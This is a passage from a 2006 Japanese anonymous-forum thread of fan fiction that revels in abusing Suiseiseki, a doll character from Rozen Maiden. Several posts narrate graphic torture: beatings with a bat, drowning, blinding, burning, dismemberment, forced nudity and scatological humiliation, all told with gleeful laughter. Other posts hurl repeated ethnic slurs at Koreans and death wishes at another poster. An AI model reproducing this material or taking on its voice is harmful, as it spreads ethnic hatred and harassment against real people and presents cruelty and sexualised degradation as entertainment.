↑きんもーっ☆!!!!!!!!!!!!!!!!!!!!!!!!!

338 :名無しちゃん…電波届いた?:2006/11/24(金) 19:43:10
きもちーおーっ☆^^^^^^^^^^^^^^^^^^^^

339 :名無しちゃん…電波届いた?:2006/11/24(金) 19:51:53
もう見てられない!!!!!!!!!!!!!!!!さよなら、朝鮮人ども!!!!!!!!!!!!!!!!またくるわ!!!!!!!!!!

340 :名無しちゃん…電波届いた?:2006/11/24(金) 21:13:55
いつものように世間は平凡に時が流れている。だが、ある家では空気が悪かった。
『おい、翠星石!僕はお前みたいな性悪な奴が一番ムカつくんだよ!!大人ぶってるつもりか知らんが中身は所詮ガキのくせに!!』
ある日僕は突然、相変わらず小生意気な翠星石に殺意がわいた。
「はぁ!?いきなり何を言い出すですかチビ人間!!私こそお前みたいな凡人なんぞムカつくのですぅ!」
やはり大体予想していた小生意気な返事が返ってきた。
『お前という非常識な生き物はこの家に置いてもらっといて感謝と言うのがないのか!?』
「それは仕方ない事ですぅ!お前は私のミーディアムなんですから!!私だってお前なんぞの家にいたくないですぅ!
 今すぐ契約を解きたいぐらいですぅ!!」
僕は“だったら契約を解けばいいだろ!”とは言わず、ただただ言い争いを続けていた。
僕はそろそろ疲れてきたので、言い争いだけで終わらせるつもりだった。この時は…本当に、“この時まで”は…。
だが、翠星石のこの一言を聞いて僕の理性はブチ切れた。
「テメェなんかをミーディアムにして死ぬほど後悔してるですぅ!!テメェみたいな社会のゴミはさっさと地獄の底に失せやがれですぅ!!」
翠星石は叫ぶだけ好き勝手に叫んで鞄の中に閉じこもろうとした。
だが、僕は、いつもはそれを見守るだけなのに、翠星石が鞄の扉を勢い良く開けた所を翠星石の長い髪を捕まえ、床に叩きつけた。
「痛っ…何しやがるですかぁ!離せですぅ!!」
当然翠星石は怒り、怒鳴った。床に押さえられたままの翠星石はバタバタと暴れた。
それが余計に僕の加虐心を震わせた。

341 :名無しちゃん…電波届いた?:2006/11/24(金) 21:15:09
『本当はいつものように言い争うだけで終わらせるつもりだったんだ。だが、お前が言った一言のせいで気が変わった。
 後悔しながら苦しむんだな』
僕は翠星石の髪を掴んだまま、引きずり回した。
「痛あぁぁあぁっ!!やめてですぅぅ〜〜!!」翠星石は髪を引っ張られて起きた激痛に耐えきれず、泣き叫ぶ。
『ぶはははは!!いつもは僕の事を無様だとか言う今のお前はもっと無様だな!!てか人形って痛みとかないんじゃないのかよ!?』
「に…んぎょうに‥だってぇ…生きてたら痛みぐらい‥あるですぅっ‥」
僕は翠星石の髪を掴んだままブラブラと振り回した。
翠星石の髪はボサボサになり、顔は涙でグチャグチャだった。
僕はそれを見て、狂ったように大笑いした。
「スィ…スィドリーム!!」
翠星石は何とか力を振り絞り、人工精霊の名を叫んだ。
すると緑に輝く人工精霊が飛び出してきた。そして僕に襲い掛かってきた。
だが、理性が切れた僕は、簡単にスィドリームを叩き落とした。
スィドリームはあわてて部屋の外に逃げ出した。
「スィ‥ドリームの役立たずですうぅぅ!!」
翠星石は、なお叫び続けている。
『おい、翠星石!お前今人工精霊を使って僕を攻撃しようとしたな…!?』
翠星石を再び床に叩きつけ、僕は鬼のような顔で翠星石を睨み見下した。
「ひぃっ…な‥何です!?」
翠星石は怯えて全身が震えている。
『そうだ。お前のその“ですです”言う口癖もうざったかったんだよな!!ケケッ』
僕は近くにあった金属バッドで動けなくなっている翠星石を殴り付けた。

342 :名無しちゃん…電波届いた?:2006/11/24(金) 21:16:39
「ぎゃあッ!!痛すぎるで…すぅ!真紅ぅ!…雛苺…蒼星石ぃ〜…!!」
『ぐははは!!他の人形に助けを求めようったって無駄無駄!!あいつらには聞こえねーよ!!』
僕は無茶苦茶に殴りまくった。翠星石の顔が変形してきた。
「ぃ…やぁっ‥翠星石はただ‥自分の意見を言っただけなのにぃ‥っ!!ぅぐっ!」
『もっと泣き叫べよ。泣き叫んで暴れて僕を楽しませろよ性悪人形!!』
「お前は‥狂ってる‥ですぅ!」
『何とでも言え!今の僕には無効だ!それ以前にそれ以上の言葉をお前に言われてるからな!ケケケッ』
僕は完全に正気を失い、狂っていた。さんざん殴った後、今度は服をビリビリに引き裂き、全裸にした。
「何するですか!!やめやがれですぅ!この変態!!」
翠星石は驚いて再び暴れだした。
『おっ!まだ反抗する元気が残ってたか。別にお前なんかに欲情しねーよ!何するかって?こうするんだよ!』
僕は全裸になった翠星石の全身を縄で頑丈に縛り、泣き叫ぶ翠星石を無視して髪を切り始めた。
「やめやがれですぅ!お父様に造っていただいたこの身体…お前が好き勝手にするな‥ですぅ!!」
『うっせぇーなぁ!この長くて汚ねぇ髪!邪魔なんだよ!!かっこつけて先を巻きやがって!!口癖の次にムカつくお前の容姿だな!』
僕は乱暴にジャキジャキと鋏を鳴らしながら容赦なく翠星石の髪を切っていく。

343 :名無しちゃん…電波届いた?:2006/11/24(金) 21:32:06
「嫌ぁ!やめやがれですぅ!殺す気かこのチクショーめですぅ!!」
なお乱暴になっていく翠星石の口。
『はぁ!?お前はさっき、殴られた事でもぅ死んだようなもんだろ!?まだ殴られたりねーのかよ!
 だったら望み通りにしてやるよ!!ケケケッ』
僕は鋏を投げ、再び金属バッドを掴むと翠星石の頭を、身体を、とにかく全身を殴り始めた。
「ぐ…ぎゃぁあぁあっ!!や‥めろ‥ですぅ!いゃぁっ!」
泣き叫ぶ翠星石を見て今までの征服感が一気に最高潮に達し、満足した僕は『次で最後だ!』と言うと、翠星石の首を締め始めた。
「げ…げっほ…や‥め‥げほぉっ!!」
翠星石は白目をむき、動かなくなった。
僕は、なお虐待を続けようと翠星石のゼンマイを巻き、無理矢理動かそうとする。
だが、いくらやっても翠星石は全く動かない。
僕は翠星石が死んだみたいなもんだと理解すると本気で壊れて一人で大笑いした。
『壊れたか?ジャンクになったのか?おい翠星石、ぐゎはははははは!!』
僕は取りあえず、動かなくなった翠星石の身体をバラバラにすると、それぞれをバラバラに捨てた。

344 :名無しちゃん…電波届いた?:2006/11/24(金) 21:33:16
日がゆっくりと上る頃、
翠星石は憂欝になりながらも重い身体を引きずりだした。
〜今日もまた痛い目にあうと覚悟しながら。
どこかに隠れてようと隠れる場所を考えていると、部屋の扉が勢い良く開く。
翠星石がもっとも怖れていた人物が入ってきた。
「ち…チビ人間…!!」
『あ?誰がチビだとぉ?』
人間はそういうと翠星石に近づいた。
「くっ…来るなですぅ!」
翠星石はあわてて人間の動きを止めようと近くにある物を人間めがけて投げ出した。
人間はそれを軽々と避け、ギロッと翠星石を睨み付けた。
翠星石はそれにビクッと身体を硬直させ、震えだした。
『お前、誰に向かって物投げてんだよ?』
尚更人間を怒らせてしまった。
人間は翠星石のもとへ歩き、どんどん翠星石との距離を縮めていく。
もはや翠星石にもう抵抗はできなかった。
人間は翠星石の髪を掴みあげると翠星石の身体が浮く。
「痛っ…痛いですぅ!!お願い離して‥」
『はぁ!?聞こえね〜よ!マジで何言ってっか聞こえねぇ!あははは!!』
人間は翠星石の願いに耳も傾けず、髪を掴んだまま翠星石を振り回した。
「いやぁ!!痛いですぅ!!どうかなりそうですぅ〜やめてですぅ〜やめてぇ〜!!」
さすがに髪を引っ張られる痛みには耐えられないのか翠星石はひたすら叫んだ。
『うるせぇんだよ!自分で種まいたくせにギャーギャー騒ぎやがって!!どうかなるならなっちまえよ!
 お前みたいな生意気なヤツいじめるのってマジ楽しいんだけど!簡単にやめるわけねぇじゃん!』
人間はそう言うと、翠星石を振り回す速度を速める。
「ーッ…に…人間!!やめやがれですぅ!お前は本当に…頭おかしいです…っ!病院に行きやがれですぅ〜〜!!」
『僕の頭がおかしいだって?フン!お前ほどじゃねぇよ!このバカ石!!』
人間は笑いながら翠星石を罵倒する。

345 :名無しちゃん…電波届いた?:2006/11/24(金) 21:34:32
「やめろと言ったらやめやがれですぅ!わかんねぇのか!こんチクショーヤローですぅ〜〜!!」
翠星石は無駄だとわかっていても、つい、いつものように毒舌で言い返した。
『お前はまだ自分におかれた状況がわかってねぇみたいだな!』
人間はそう言うと、翠星石を壁に投げ付けた。
「きゃあっ!痛…ぁいですぅ…乱暴なヤロゥ‥ですね!!」
『相変わらず身のほど知らずのバカだな!お前は!まぁ、そんなお前だからこそいじめがいがあるんだがな!ゲハハハ!』
人間は翠星石のもとへ歩み寄ると、倒れてうずくまっている翠星石の腹を思いっきり蹴り上げた。
「ぅげ!…ぇほ…っ何を‥!?」
反論しようとする翠星石を無視し、何度も腹を蹴る。
「げぇ…っ!ぅっ!いやぁ‥やめて‥ぅぐっ!!」
部屋中にドスドスと蹴る音や翠星石の咳き込んだ悲鳴、人間の怒鳴り声が響く。
ぐったりと意識が薄れかかってうずくまっている翠星石を見て、腹を蹴る事に飽きた人間は目を閉じた翠星石の顔を蹴りだした。
その衝撃で、翠星石は一気に意識がはっきりと戻った。
「ぃだっ!…ですぅ!!顔が変になる…ですぅ〜!!ぅぐっ!」
翠星石はあまりの激痛に言葉にならない声をあげながら涙を流した。
『はんっ!何を言うか!!お前の顔は元々から変なんだよ!バーカ!キキキッ』
翠星石の顔は一気に変形した。
それをみて人間は大爆笑する。
翠星石はそんな人間を見ながらも、かなりの屈辱感に耐えていた。
『そうだ!お前の顔のその片方色が違う目!右の緑の目も左の赤い目のように真っ赤な目に変えてやるよ!』
人間は指の長い爪で翠星石の右の緑の目を刺した。
「ぅぎぃあぁあぁあ!!やめろぉですぅ!痛すぎるですっ!ぃやぁ〜〜〜!!」
翠星石は激しく悶えた。
いつもの苦しみや痛みとははるかに違う、目を刺された激痛を越えた痛み。
翠星石はひたすら泣き叫ぶしかなかった。

346 :名無しちゃん…電波届いた?:2006/11/24(金) 21:35:10
人間は悪魔のように、ひたすら苦しむ翠星石を笑いながら見下している。
『なんだよぉ!やっぱり人形だな!血なんか出やしない!しゃべったり動いたり食ったりするくせによぉ!残念だな!』
翠星石は反論する気力もなくなった。
その時、人間は何を思いついたのか、翠星石の髪をつかみ、風呂場まで引きずった。
冬場の風呂場。氷のように冷たくなっている湯槽に翠星石を投げ入れた。
傷口がしみる痛みとお湯の冷たさに翠星石は絶叫した。
「ぎゃあぁぁあぁあ!!!冷た…っ!!痛いですぅ〜〜〜!!!!」
人間は嘲笑い、必死に這い上がって来ようとする翠星石を近くにあった掻き混ぜ棒で沈めようと押しつけた。
押して押し込み、ばたばたと暴れる翠星石を楽しそうに観覧する。
『無駄だ無駄だ!!今のお前には何もできまい!ゲハハハ!!』
人間の言う通り、翠星石は冷たいお湯の中で必死に掻き混ぜ棒を避けようとするが、無駄だった。
人間はひたすら爆笑しながら翠星石を押して押し込み、見下している。
「げぼっ‥ごぼ…っ‥…がばごぼ…‥ぉ‥っ!!」
しばらく押し込んでいると、翠星石は完全に動かなくなった。
〜何で私だけがこんな目に…たったあんな口論だけで…〜
そんな思いを残しながら…

347 :名無しちゃん…電波届いた?:2006/11/24(金) 22:50:48
朝鮮のビチグソども!!!!!!!!!!馬鹿ども!!!!!!!!消えろ!!!!!!!!!!!

348 :翠星石虐待反対!:2006/11/24(金) 23:05:21
そうだ、もっといってやれ!!

349 :名無しちゃん…電波届いた?:2006/11/24(金) 23:35:01
>>347
…やれやれ、ちょっと目を離した隙に、ま〜た変なのが紛れ込んで来たお^^;

糞翠のお尻を布団たたきで腫れあがるまでビシバシ叩きたいお^^


350 :名無しちゃん…電波届いた?:2006/11/24(金) 23:41:27
>>348
…っと…それで、君が新参君かお? 糞翠虐待スレにようこそだお^^
↑の朝鮮人に惑わされちゃ駄目だお。一緒に糞翠を虐待しようお^^

糞翠のアナルにチューブの辛子丸々一本注入したいお^^


351 :>>347の迷言集!!!!!!!!:2006/11/24(金) 23:43:13
618 :おたく、名無しさん?: :2006/10/09(月) 02:49:30
ひどい・・・!(←多分これが初登場w)
641 :おたく、名無しさん?: :2006/10/12(木) 00:17:50
もうやめて!!!
654 :おたく、名無しさん?: :2006/10/13(金) 15:47:14
ひどいよ!!!!
660 :おたく、名無しさん?: :2006/10/13(金) 19:28:54
いいかげんにして!!!!!!
333 :名無しさん@お腹いっぱい。: :2006/10/14(土) 18:16:16
帰って!!(←独身貴族板にも進出w)
341 :名無しさん@お腹いっぱい。: :2006/10/14(土) 23:23:28
もうやめて!!!!!!
343 :名無しさん@お腹いっぱい。: :2006/10/15(日) 03:11:17
いやがらせをやめて!!!!!
350 :名無しさん@お腹いっぱい。: :2006/10/15(日) 16:16:52
いいかげんにして!!!!
355 :名無しさん@お腹いっぱい。: :2006/10/16(月) 20:18:22
きちがい!!!!!!!
359 :名無しさん@お腹いっぱい。: :2006/10/17(火) 17:31:52
翠星石>>>>>>>>>>>>>>>>>>>>>>>>>>>>その他デブス萎人形
361 :名無しさん@お腹いっぱい。: :2006/10/17(火) 23:47:29
もう勘弁してあげて!!!
367 :名無しさん@お腹いっぱい。: :2006/10/18(水) 02:50:35
人非人!!!!
369 :名無しさん@お腹いっぱい。: :2006/10/18(水) 09:59:05

もういや!!!
死んで!!!!
371 :名無しさん@お腹いっぱい。: :2006/10/18(水) 12:08:50

ばか!!!ひょっとこ!!!!

352 :>>347の迷言集!!!!!!!!:2006/11/24(金) 23:44:52
377 :名無しさん@お腹いっぱい。: :2006/10/19(木) 10:15:34
入院して!!!!
379 :名無しさん@お腹いっぱい。: :2006/10/20(金) 04:17:29
もう見てられない!!!!
381 :名無しさん@お腹いっぱい。: :2006/10/20(金) 11:05:28
さようなら!!!!永遠に!!!!!
390 :名無しさん@お腹いっぱい。:sage :2006/10/21(土) 18:14:08
翠タム萌え! 他のブサイクガラクタデブス人形萎え!(←相変わらず居座るw)
395 :名無しさん@お腹いっぱい。: :2006/10/21(土) 22:04:55
↑やめて!!!!
397 :名無しさん@お腹いっぱい。: :2006/10/22(日) 00:49:01
↑きちがい!!!!
↓乞食!!!!
409 :名無しさん@お腹いっぱい。: :2006/10/25(水) 09:55:09
>>400
はげしくどうい!!!!>>401-408きもい!!!!しね!!!!!!
412 :名無しさん@お腹いっぱい。: :2006/10/25(水) 12:46:13
↑キャッチして大切に保護するわ!!!!1
418 :名無しさん@お腹いっぱい。: :2006/10/26(木) 13:23:56
>>416ばか!!!ばか!!!!まんこ!!!!
420 :名無しさん@お腹いっぱい。: :2006/10/27(金) 13:09:42
↑しねはげ!!!!!!!!!!!しばくぞ!!!!!!
429 :名無しさん@お腹いっぱい。: :2006/10/28(土) 02:37:07
>>427
はげどう!!!!!翠ちゃん以外びちぐそ!!!!それ以下!!!!!
翠ちゃん以外いらない!!!!この世からきえて!!!!!
432 :名無しさん@お腹いっぱい。: :2006/10/28(土) 12:47:35
>>431
ことばのあやをとらないで!!!!朝鮮人!!!!(←急に朝鮮人を差別w)
けとうも消えて!!!!!
444 :名無しさん@お腹いっぱい。: :2006/10/29(日) 02:51:07
どうして翠ちゃんをいじめるの!!!朝鮮人!!!!くにへかえって!!!!

353 :>>347の迷言集!!!!!!!!:2006/11/24(金) 23:46:06
459 :名無しさん@お腹いっぱい。: :2006/10/29(日) 17:46:47
翠ちゃん以外きちがい!!!!
翠ちゃん以外朝鮮人!!!!!!
462 :名無しさん@お腹いっぱい。: :2006/10/30(月) 00:42:30
↑朝鮮人!!!!!許さない!!!!!!
467 :名無しさん@お腹いっぱい。: :2006/10/30(月) 01:42:08
>>1-466
朝鮮人くにへかえって!!!!!!!!!翠ちゃんをくさいキムチで汚さないで!!!!!!!!しねはげ!!!!!!!!
477 :名無しさん@お腹いっぱい。: :2006/10/31(火) 00:40:10
>>474-476
なにをこそこそと密談しているの!!!!!!朝鮮人ども!!!!!!!!
翠ちゃんをおとしめる陰謀は許さない!!!!!!!!!
480 :名無しさん@お腹いっぱい。: :2006/10/31(火) 01:36:35
>>478-479
悪いけれど朝鮮人の暇をしている相手はないの!!!!永遠にさようなら!!!!!!
484 :名無しさん@お腹いっぱい。: :2006/10/31(火) 01:51:19
↑下痢便野郎!!!!!!!!ケツの穴野郎!!!!!!!!!
487 :名無しさん@お腹いっぱい。: :2006/10/31(火) 02:37:10
>>478恐ろしい!!!!!!このしつこさ!!!!粘着ぶり!!!!!!
みんなも朝鮮人にだけは目をつけられないように気をつけて!!!!!
491 :名無しさん@お腹いっぱい。: :2006/10/31(火) 16:14:22
きちがいうんこはげ!!!!!!!!!!
翠ちゃんの肛門を下痢便から直飲みしたい!!!!!!
497 :名無しさん@お腹いっぱい。: :2006/11/01(水) 10:30:36
翠ちゃんは下痢しない!!!!!!肛門なんてない!!!!!
500 :名無しさん@お腹いっぱい。: :2006/11/02(木) 01:01:08
真紅の!!!!!!!下痢便を!!!!!!!
肛門から直飲みできるのは朝鮮人だけ!!!!!!臭い!!!!!
503 :名無しさん@お腹いっぱい。: :2006/11/02(木) 13:50:48
朝鮮人wwwwwwwwwwwwwwwwwww!!!!!!!1111!
日本語間違える朝鮮人wwwwwwwwwwwwwww!!!!!!!!!!
真紅厨はやっぱり朝鮮人なんだわ!!!!!!!!11111!!!!!

354 :翠星石虐待反対!:2006/11/24(金) 23:48:14
514 :名無しさん@お腹いっぱい。: :2006/11/03(金) 23:52:23
こんなスレを見ているのは人間の屑よ!!!!!!!
516 :名無しさん@お腹いっぱい。: :2006/11/04(土) 15:00:18
↑屑!!!!!!!あげあしをとらないで!!!!!!
518 :名無しさん@お腹いっぱい。: :2006/11/05(日) 02:01:23
>>1-517
屑!!!!!!しね!!!!
522 :名無しさん@お腹いっぱい。: :2006/11/06(月) 21:30:11
やめて!!!!!!人を傷つけてそんなに楽しいの!!!!?????
立てるなら真紅虐待スレにして!!!!!
526 :名無しさん@お腹いっぱい。: :2006/11/08(水) 15:14:57
絶対行かないから!!!!!!(←といいつつ結局逝きますw)
528 :名無しさん@お腹いっぱい。: :2006/11/08(水) 18:57:29
こそこそして!!!!!どこよ!!!!!!

>>350
目が覚めました!共に翠星石を虐待しましょう!

355 :名無しちゃん…電波届いた?:2006/11/25(土) 15:39:32
         ≦_ ̄_ ̄─
  _ ─       ≦_ ● )
≦_  ● )        ̄≡/
  ≦_ ≡\       /     '・;.ガッ!'・;.ガッ!'・;.ガッ!
          \Γ 了/      ;:.ガッ! :;:.,:;;ガッ!,:;;ガッ!'・;.ガッ!
            |.@|        ・;..'・;..・;..,:;;ガッ!'・;..ガッ!,:;;ガッ!
 キュイーン・・・!  /|  .| \  "・;..';゙;・;,:;;ガッ!..'・;."・,:;;ガッ!;..';゙;・;..'・;.ガッ!ガッ!
    .    /  .|   |   \ミ  ̄─ ≧_。;く/',二二ヽ>"・;..';゙;・;..'・;.ガッ!
       / ミ   .|   |    (●   <  >|l |ノノイハ))∩.'` ,:;;ガッ!,:;;ガッ!・;..'・ガッ!
       ( ●  ̄ ≧_ ・;..';゙;・;..'・;..rノl_|リ〈#)゚々。ノ|/;;`..',,,',:;;ガッ!`;;,,.ガッ!
         ─_  _≧∴゙;:;:.,:;;∴゙;:;∴゙;:;:.,:;;ガッ! でぐぅー
            ̄ ∴゙;:;:.,:;;;グモッ∴゙;:;:.,:;;; チュイーン,:;;ガッ!'・;.ガッ!
                       '・;.ガッ! '・;.ガッ!'・;.ガッ!,:;;ガッ!

356 :名無しちゃん…電波届いた?:2006/11/25(土) 18:41:14
>>354
本当にそう思ったんなら、まずはそのコテを外せ。
神聖なスレが汚れる。

357 :翠星石虐待賛成!:2006/11/25(土) 22:13:44
すみませんでした!

358 :翠星石虐待賛成!:2006/11/25(土) 22:18:49
翠基地のログを集めてて思ったんですが、何故あんな木偶にここまで必死になれるんでしょうね?
昨日までの自分もそうでしたがw

359 :名無しちゃん…電波届いた?:2006/11/25(土) 23:38:13
>>358
そりゃあ、かつて一世を風靡したツンデレ要素をたまたま糞翠が持ち合わせてたのと、
あの「ですぅ」節に、何故か魅了されちゃった可愛そうな人達が、未だに多いからだよ。

…それも風前の燈だっていうのに、まだ根強く擁護する奴がたくさんいるのが信じられん…。

360 :名無しちゃん…電波届いた?:2006/11/25(土) 23:48:16
なんて鬼畜なスレなのココは!!!!!!!!まるで肥溜めね!!!!!!!!!!!!!!!!
翠ちゃんが可哀相!!!!!!!!!!!極悪朝鮮人どもは死んで!!!!!!!!!!!!

361 :名無しちゃん…電波届いた?:2006/11/26(日) 00:29:26
>>360キモチ悪いですぅ〜

吐き気がするですぅ〜〜

っうぇwwwっうぇwwwwwwww

362 :翠星石虐待賛成!:2006/11/26(日) 00:29:29
「肥溜め」とは、アナタの脳味噌のことをいうのですかな?
そして可哀相なのは翠ちゃん(←自分もよく言ってたなあw)よりも真実に気づいてないアナタだ!


363 :名無しちゃん…電波届いた?:2006/11/26(日) 00:37:36
>>361-362
うぜえよボケ禿げビチグソ!!!!!!!!下痢便でも喰らってろ!!!!!!ウジ虫どもが!!!!!!!!!!!!!!!!!

364 :名無しちゃん…電波届いた?:2006/11/26(日) 00:44:50
翠ちゃんは!!!!!!!!!ローゼンメイデン1可愛い!!!!!!世界一!!!!!!!!!!!!!!!
他のガラクタ人形どもと翠ちゃん虐める朝鮮人どもなんていらない!!!!!!!!死ね!!!!!!!!!!!!!!!!!!!

365 :名無しちゃん…電波届いた?:2006/11/26(日) 01:21:56
お前が氏ね

366 :名無しちゃん…電波届いた?:2006/11/26(日) 01:31:01
「今日は良い天気だから庭に出て水をまくですよ?ちびもたまには暗〜い薄汚ねー部屋から出てきやがれです!」
仕事で忙しくたまの休日でへとへとの俺は、その一言でキレた。
「ざけんな!!!!!!!!!!!俺は疲れてるんだよ!!!!!!!!!!!!
 そんなに木に水やるのが好きなら公園にでも住みやがれ!!!!!!!!」
「きゃー吠えたですぅ!ツバをとばすな!汚らわしいですぅ」
「な、なんだとこのクソミドリっ!!!!!!!!!!!!」
そう怒鳴りつけ俺は翠星石のドレスをひきはがした。
「ああっ!何するですか!変態ちび!」
「うるせぇ!!!!!!!!!!!!!こんなもんこうだ!!!!!!!!!!!!」
俺はガスレンジの上にドレスを放り点火した。
ごおっ
バーナーの火にあおられあっと言う間にケシ炭になる翠星石のドレス
「翠星石のドレスがあ!なんてことするですか!」
「うるせぇ!!!!!!!!!てめぇにはもう必要ねーだろが!!!!!!!」
おれはバットで翠星石の頭をカチ殴った。
「んっぎゃああー!!翠星石が何をしたっていうですか!」
「まだほざくか!!!!!!!!このクソミドリ!!!!!!!!!」
さらに俺は乱打する。
「ごふっ!ぶっ!やめてげふ!いたいですぅ゛げっ」
俺はとうとう全裸でぐったりしてしまった翠星石を見て、笑みを浮かべ言った。
「俺がつれていってやるよ!!!!!!!!オマエにふさわしい場所にな!!!!!!!!!!!」

367 :名無しちゃん…電波届いた?:2006/11/26(日) 01:34:31
「んん…ここはどこですか?」
気絶から目を覚ました翠星石は辺りを見回した。
「ここは公園ですぅ!たしか噴水のところですぅ」
「目が覚めたようだな」
「ちび!こんなところに翠星石をつれてきてどうするつもりですぅ!」
「どうするもなにも、もうすんだ」
「何わけのわからねーことを…?!か、体が動かねぇですぅ!」
「間接部にセメント流し込んだんだ」
翠星石は公園の真ん中で全裸でしゃがんだ状態で固定されてしまってたのだ。
「な、なんてことするですかあ!」
公衆の面前でそのあまりに恥ずかしい姿に全身真っ赤になる翠星石。
だが辱めはまだ終わらなかった。
「そろそろだな」
俺は時計を見ながらつぶやいた。
その時だった、しゃがんだ翠星石の股間から、シャーッと水が勢いよく飛び出した!
「いやああっなんですかあ!」
「お似合いだぜクソミドリ!!!!!!!!!!!木に水まくの好きだっていうからさ!!!!!!!!!!!!1」
そう俺は翠星石が気絶してる間に、翠星石に噴水装置をとりつけたんだw
「いやいやいや!こんなの嫌〜ですぅ!」

数日後。
街のタウン誌で街のニュースポットとしてクソミドリが『ション便小娘』として写真入りで紹介されてたw
大笑いだぜ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1

(※この話に出てくる「俺」は喋り方が誰かさんに似ていますが気のせいですw)

368 :名無しちゃん…電波届いた?:2006/11/26(日) 01:36:15
氏ね翠厨。リアルで相手にしてもらえないからって翠星石を敬愛してんじゃねーよ。可愛そうだろ翠星石が!


…あ、おまえもなんだかんだ言って、虐待してんのね。

369 :名無しちゃん…電波届いた?:2006/11/26(日) 09:37:46
>>365-368
皆して、一体何やってんだお^^#
駄目だお、そんな事じゃ…




もっと派手にやんなきゃ駄目だおwwwwwwwwwwwwwwwwwwwwwwww

糞翠の頭ぶっこ抜いて、植木鉢として…って、水漏れして使い物にならないお…^^;
しょうがないから、ボーリング球として……あれ?
ピンに当たったら、粉々になっちゃったお^^;
最期の台詞はやっぱり「DEATH〜!」だったお^m^
糞翠は有害な上に、最後まで糞の役にもたたない、使えない奴だったお^^

370 :名無しちゃん…電波届いた:2006/11/26(日) 14:00:17
今日も日頃のストレス、憂さ晴らしに「翠星石」を虐待。
嫌がる奴の両手の指をシュレッダーに強制挿入させる。
ヴィィィンガリガリガリガリガリガリ!
「ひぎっぅぎゃあああああ!!痛い!痛い!痛いですぅ!」
見事に10本あった指が切断された。
次に100℃の熱湯を満たした洗面器に指なしジャンクの顔面を無理やりつける。
「あつ!!熱いです!やめろですぅ!!」
等といつも通りのリアクションをみせるが、俺は構わず熱湯の中で翠星石を溺れさせた。
30分も苛めると、翠星石はいつもの泣き言を言い出した。
「何でこんな事するですか〜うぅ…ひどいですぅ…うぅ、えぐっぐすん…」
…こいつの泣き顔を見ながら思った。
明日はどんな虐待を加えてやろうか、と……。

「でぇぇぇすぅぅぅぅ!!!」
全裸で四つん這いになって脱糞しながらネジを巻かれた後、
「お腹が空いたですぅ!」
とか言って自らの汚物を口にする翠星石。
「ムシャムシャうんこうめぇですぅ!」
美味しそうに糞を食べる食糞・スカトロドール翠星石。
「…たった今アリスが誕生しました…」
「い、今何て言ったかしら〜?」
「薔薇水晶…まさか貴女、向こうで唸ってるジャンクがアリスだとでも言うの?」
「でぇぇぇぇすぅ!!ムシャムシャうんこうめぇですぅ!たまんねぇですよ!!」
「翠星石こそアリスに最も相応しいのですぅ!薔薇水晶はよく分かってやがるですぅ!」
真紅達は美味しそうに便を頬張る翠星石を怪訝な表情で見続けるのだった……。

371 :名無しちゃん…電波届いた:2006/11/26(日) 14:01:07
「人間、暑いですぅ!エアコンつけやがれですぅ!」
「あぁ?今エアコン壊れてんだよ。」
「まったく使えねーへっぽこ機械ですぅ!」
…頭にきたので、近所を流れる深い川にこうるさいバカ人形を投げ込んだ。
バシャーン!「ゲボッ!ゴボゴボ〜ぷはっ!ぐ、ぐるぢいですぅ〜助け…」
どうやら翠星石はカナヅチらしい。不様にも溺れてもがいてやがる。
面白いので暫く様子を観察。
「た、助けてです!ぶはぁ〜げほっ!苦しいですぅ!!」
「こんな分厚いドレスじゃ泳げねぇよなぁ〜」
俺は独り言を言うと、暑いのでアイスを買いにコンビニへ向かった。
…その後緩やかな川の流れに乗って、緑色のドザエモン(溺死体)が下流を漂うのだった。

翠星石…マゾヒスティックなその容姿と礼儀を知らない減らず口。
それ故に俺の加虐心とサディズムは止まらない。
ただ翠星石がそこにいるだけで、俺の体の奥から暴力性と殺意と憤怒が湧き上がる。
だから今日もこの呪われた性悪人形はサンドバックだ。
バキッ!ドスッ!ズン!バコッ!ドスッ!ガン!
「痛いですぅ〜(泣)!やめてですぅ!」
ですぅですぅ泣きわめけ糞ミドリ!!てめぇの泣きっ面を見てるとますますぶちのめしたくなるぜ!
アヒャヒャヒャ!

己の立場も弁えず、偉そうに人間を馬鹿にする翠星石。
臆病で人見知りの癖にひきこもり少年にはめっぽう強い性悪人形。
…こんなのがローゼンメイデン1人気があるだと…?
ツンデレに萌え〜?翠星石可愛い?お家にお迎えしたい?バレンタインにチョコ貰った?
はぁ?こんな緑のボロキレ纏った出来損ない、知障・白痴・クズ・ゴミカタワが好きなの?
俺だったら即ジャンクにするけどなぁ。

372 :名無しちゃん…電波届いた:2006/11/26(日) 14:01:57
翠星石ぃひひひひ!!死ねおらぁ!!!
ドスッ!バン、ゴン、グシャ!バキッバコッ!ドン!スパッ!グサッ!
「う!うぅ……痛いですぅ!何でこんな…」
ああああああああああああ!!
悪魔に憑依された狂気の少年は、今夜も翠星石と自分の部屋を破壊するのだった…。
「や、やめるです!怖いですぅ…!」
泣きべそをかきながら震える糞翠はあまりの恐怖に失禁&脱糞してしまった。
くせぇ!くせぇぇぇぇぞゴラァ!!!
少年は持っていた金属バットを翠星石の頭に何度も振り下ろした。
「いぐっ!!うぐっ!ですぅ!!」
「ですぅ!」じゃねぇ!糞ミドリぃぃぃっ!!!
バコーン!グチャ!!
飛び散るカケラ、飛び出たオッドアイ。
ざまーみろ!アヒャヒャヒャヒャヒャヒャヒャヒャヒャ!!

ですぅですぅ言ってるバカ人形を四肢切断して首輪繋いでサンドバックに!
殴られる度に
「痛いですぅ!やめてですぅ!」
とほざく。
体中がボロボロに砕けるまで殴る!
「痛いですぅ!!ヒドイです!何しやがるですぅ!!」
救われない地獄に堕ちた木偶人形が!!

ですぅですぅ五月蠅いボロミドリがいたので、唐辛子スプレーを噴射したら、
「へぶっ!やめろですぅ!目が痛いです!げほっ!」
とか言ってやがったので木刀で頭をかち割っといた。
眼球が飛び出てグチャグチャな顔面はオカルトそのものだった。
きめえ!!

373 :名無しちゃん…電波届いた?:2006/11/26(日) 14:08:11
ですぅですぅ五月蠅い糞ミドリ虫がいたので、殺虫剤を大量噴射しといた。
そしたら
「ぶへっ、や、やめろですぅ!何しやがるです!」
とか言うから益々ムカついてガソリンかけて火をつけたらすごい勢いで燃えあがって、
ギャーギャー喚きながら糞ミドリ虫が地面の上をのたうちまわってた。
面白かった!

ですぅですぅ五月蠅いクソミドリがいたので、とりあえず殴った。
そしたら
「痛いですぅ!」
とかマゾな事言いやがったので、更にタコ殴りにしといた。
「痛いですぅ…やめてですぅ!」
とかまだマゾな戯言をぬかすので
金槌で原形をとどめないほど乱打してみた。
それでも
「何するです……蒼星石…助けてですぅ…」
とか言うので焼却炉に放り込んどいた。
